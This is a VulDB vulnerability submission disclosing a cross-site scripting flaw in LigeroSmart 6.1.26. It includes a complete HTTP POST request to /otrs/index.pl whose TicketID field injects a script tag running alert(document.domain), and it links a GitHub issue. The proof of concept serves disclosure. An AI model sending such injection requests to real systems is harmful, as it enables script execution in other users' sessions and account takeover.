Submit #729402: LigeroSmart 6.1.26 Cross Site Scriptinginfo

TitleLigeroSmart 6.1.26 Cross Site Scripting
DescriptionIt was identified that the TicketID parameter allows for cross-site scripting. POST /otrs/index.pl HTTP/1.1 Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw Referer: http://192.168.12.212/otrs/index.pl Cookie: OTRSAgentInterface=2gHtFoG2h2zqFgLp8ZG1PJLBN8aaaZsd Content-Length: 458 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: 192.168.12.212 Connection: Keep-alive ------------YWJkMTQzNDcw Content-Disposition: form-data; name="Action" AgentTicketBulk ------------YWJkMTQzNDcw Content-Disposition: form-data; name="ChallengeToken" XeWmehc6OomplK79F9jNC7Dv2VSk6uZC ------------YWJkMTQzNDcw Content-Disposition: form-data; name="LastColumnFilter" aYlNlfdX ------------YWJkMTQzNDcw Content-Disposition: form-data; name="TicketID" 1</script><script>alert(document.domain)</script> ------------YWJkMTQzNDcw-- Docker was installed and tests were performed. https://github.com/LigeroSmart/docker-ligerosmart
Source⚠️ https://github.com/LigeroSmart/ligerosmart/issues/280
User
 chor4o (UID 52584)
Submission01/02/2026 16:24 (4 months ago)
Moderation01/16/2026 17:38 (14 days later)
StatusAccepted
VulDB entry341601 [LigeroSmart up to 6.1.26 /otrs/index.pl TicketID cross site scripting]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!